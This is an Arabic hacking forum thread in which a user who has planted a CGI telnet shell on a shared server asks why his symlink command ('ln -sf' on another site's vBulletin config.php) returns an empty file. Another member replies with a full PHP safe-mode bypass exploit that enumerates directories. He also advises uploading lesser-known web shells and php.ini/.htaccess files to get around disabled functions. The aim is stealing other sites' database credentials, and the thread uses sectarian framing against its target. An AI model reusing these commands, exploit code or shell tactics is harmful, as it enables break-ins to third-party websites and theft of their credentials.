ضع اعلانك هنا

ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
العودة   عالم المعرفة > قسم الأنظمة والسيرفرات > أمن المواقع والسيرفرات > منتدى المشاكل وحلول و الطلبات والأسئلة
تفعيل العضوية استرجاع كلمة المرور شروط المنتــدى البحث مشاركات اليوم اجعل كافة الأقسام مقروءة
 

سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

منتدى المشاكل وحلول و الطلبات والأسئلة


إضافة رد
 
LinkBack أدوات الموضوع
 
قديم 06-25-2008, 04:56 AM   #1 (permalink)
عضو جديد






الديب المفترس غير متصل

الديب المفترس will become famous soon enoughالديب المفترس will become famous soon enough

افتراضي سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

السلام عليكم ورحمة الله وبركاته
ياشباب انا عندي سيبنل شيعي ورفعت سي جي اي تلنت
واستعرضت المواقع مع اليوزرات
وجربت اسحب ملف كونفيق من موقع على نفس السيرفر
بس يجيبه لي فاضي وهذا الامر



ln -sf /home/xxxx/public_html/vb/includes/config.php conf.txt


ارجو حل المشكله يااذيابه
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-25-2008, 07:30 AM   #2 (permalink)
عضو مميز
 
الصورة الرمزية ابو تيله







ابو تيله غير متصل

ابو تيله has a spectacular aura aboutابو تيله has a spectacular aura about

افتراضي رد: سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

اخوي شنو حالة السيرفر وشنو صلاحياتك على السيرفر اذا كان صلاحياتك يوزر استخدم ثغرت قرائة الملفات عن طريق داله symlink موجود شرح فيديو لها في المنتدى ولها استثمارين perl و php جرب الاثنين اما لو كان سيف مود اون استخدم هذي الثغره


كود PHP:
<? 

// Safe mode breaker. eXpl0id by KPbIC [myiworm@mail.ru] 
// data: 28.01.2006 

error_reporting(E_WARNING); 
ini_set("display_errors"1); 

echo 
"<head><title>".getcwd()."</title></head>"

echo 
"<form method=POST>"
echo 
"<div style='float: left'>Root directory: <input type=**** name=root value='{$_POST['root']}'></div>"
echo 
"<input type=submit value='--&raquo;'></form>"

echo 
"<HR>"

// break fucking safe-mode ! 

$root "/"

if(
$_POST['root']) $root $_POST['root']; 

if (!
ini_get('safe_mode')) die("Safe-mode is OFF."); 

$c 0$D = array(); 
set_error_handler("eh"); 

$chars "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

for(
$i=0$i strlen($chars); $i++){ 
$path ="{$root}".((substr($root,-1)!="/") ? "/" NULL)."{$chars[$i]}"

$prevD $D[count($D)-1]; 
glob($path."*"); 

if(
$D[count($D)-1] != $prevD){ 

for(
$j=0$j strlen($chars); $j++){ 

$path ="{$root}".((substr($root,-1)!="/") ? "/" NULL)."{$chars[$i]}{$chars[$j]}"

$prevD2 $D[count($D)-1]; 
glob($path."*"); 

if(
$D[count($D)-1] != $prevD2){ 


for(
$p=0$p strlen($chars); $p++){ 

$path ="{$root}".((substr($root,-1)!="/") ? "/" NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"

$prevD3 $D[count($D)-1]; 
glob($path."*"); 

if(
$D[count($D)-1] != $prevD3){ 


for(
$r=0$r strlen($chars); $r++){ 

$path ="{$root}".((substr($root,-1)!="/") ? "/" NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"
glob($path."*"); 















$D array_unique($D); 

echo 
"<xmp>"
foreach(
$D as $item) echo "{$item}\n"
echo 
"</xmp>"




function 
eh($errno$errstr$errfile$errline){ 

global 
$D$c$i
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/"$errstr$o); 
if(
$o){ $D[$c] = $o[2]; $c++;} 



?>

افتح مفكره جديده وحط فيها الكود وحفضه بسم mm.php ورفعه

ادخل عليه وحط المسار الي تبي تقراه

ولو الصلاحيات نو بدي جرب اكثر من شل بعض الشلات ماتشتغل ترفع شل ثاني تحصله اشتغل اسبب بعض دوال الشل تكون ممنوعه والحين الصحاب السيرفرات يركزون على الشلات المعروفه مثل شل r57 و c99 وسنايبر يمنعون دوالها لاكن الشلات الثانيه تشتغل ورفع ملف php.ini وملف الهتكس علشان تتسكر الدوال الممنوعه
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-25-2008, 08:58 AM   #3 (permalink)
عضو جديد






الديب المفترس غير متصل

الديب المفترس will become famous soon enoughالديب المفترس will become famous soon enough

افتراضي رد: سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

اخوي صلاحيتي يوزر والسيف مود اون
وهذي معلومات السيرفر

PHP Version: 5.2.5 cURL: OFF MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF MySQLi: OFF MSQL: OFF SQLite:
safe_mode : on

وانا بجرب اللي قلت عليه وبرجع اقول شنو صار معي

التعديل الأخير تم بواسطة الديب المفترس ; 06-25-2008 الساعة 10:45 AM.
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-25-2008, 09:06 AM   #4 (permalink)
عضو جديد






الديب المفترس غير متصل

الديب المفترس will become famous soon enoughالديب المفترس will become famous soon enough

افتراضي رد: سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

اخوي عملت الا قلت عليه حفظت الكود في مفكره بامتداد mm.php
ورفته على الموقع وجربت اقرأ ملف الكونفيق مو راضي يقرأ

الف شكر على المساعده

اتمنى تعطوني حلول اخرى

زي ماقلت لكم السيف مود اون وصلاحيتي يوزر واصدار الـ php 5.2.5
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-25-2008, 11:26 AM   #5 (permalink)
عضو مميز
 
الصورة الرمزية ابو تيله







ابو تيله غير متصل

ابو تيله has a spectacular aura aboutابو تيله has a spectacular aura about

افتراضي رد: سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

اخوي الكود الي حطيته لك يستخدم اذا حالة السيرفر on

انت استخدم داله symlink

هذا شرح الاستغلال بلغة البيرل بلفيديو
http://www.alm3refh.com/vb/t12774.html (شرح استغلال ثغرة symlink عن طريق بالـ perl // بالفيديو)

هذا شرح الاستغلال بلغة pHP
كيفة الاستفادة من دالة symlink // شرح بالفيديو - عالم المعرفة
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-25-2008, 11:29 AM   #6 (permalink)
عضو مميز
 
الصورة الرمزية ابو تيله







ابو تيله غير متصل

ابو تيله has a spectacular aura aboutابو تيله has a spectacular aura about

افتراضي رد: سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

ارفع هذي الملفين في كل مره ترفع شل فيه دوال ممنوعه علشان تقدر تتجاوزها
http://www.alamuae.com/up/Folder-001...0_htaccess.zip
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 06-25-2008, 12:41 PM   #7 (permalink)
عضو جديد






الديب المفترس غير متصل

الديب المفترس will become famous soon enoughالديب المفترس will become famous soon enough

افتراضي رد: سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

مشكور اخوي ابو تيله على المساعده
جربت بالبيرل وسحب ملف الكونفيق وأيضا طلع فاضي

ورفعت الملفين الا قلت لي بيهم << بس ارفعهم ويتعطلو الدوال ؟؟

وبعد مارفعت الملفين جربت بالـ php
برضو ماضبط !!



ايش هالسيرفر الا مو راضي يضبط معاه شي
والله عقدني بس بمساعدتكم ان شاء الله نتخطى

موفقين وشكرا على المساعده
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد

سحبت ملف الكونفيق من السيرفر وطلع فاضي... ارجو حل المشكله

منتدى المشاكل وحلول و الطلبات والأسئلة





الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة


الساعة الآن 03:51 PM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات تحميل تشفير تشقير الصفحات تطوير تعليم ثغره جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو كتاب كراك كمبيوتر محاضرات منتدى مودم نطاق نطاقات نوكيا هوز bifrost buffer crypter domain downloader exploit file inclusion iran local overflow password poison server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى


الرسول الإنسان | الدفاع عن أهل السنة | فضائح و جرائم الروافض | السنه | الحوارات الهادفة | الفلاش والسويتش | الفوتوشوب | دورة الفوتوشوب | صور | العاب | البرامج المشروحه | الفرفشه والمرح | الرياضة | الفايروسات | الهاردوير والصيانة | تطوير المنتديات والمواقع | دورة تطوير منتديات vb | الحمايه | اختراق المواقع والسيرفرات | هكرز | اختراق الشات والاميل | ثغرات | البرامج | الفيجوال بيسك | المواضيع العامه | القصص واللغات|  شات


Powered by vBulletin Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58